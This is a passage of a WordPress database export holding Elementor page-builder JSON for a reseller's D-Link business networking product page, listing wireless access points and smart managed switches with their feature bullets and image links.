]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7508,3401,'_elementor_version','2.5.14'),(7509,3401,'_elementor_edit_mode','builder'),(8671,3667,'_elementor_edit_mode','builder'),(8672,3667,'_elementor_template_type','wp-page'),(7512,3402,'_wp_page_template','template-fullwidth.php'),(7513,3402,'_elementor_template_type','post'),(7514,3402,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access 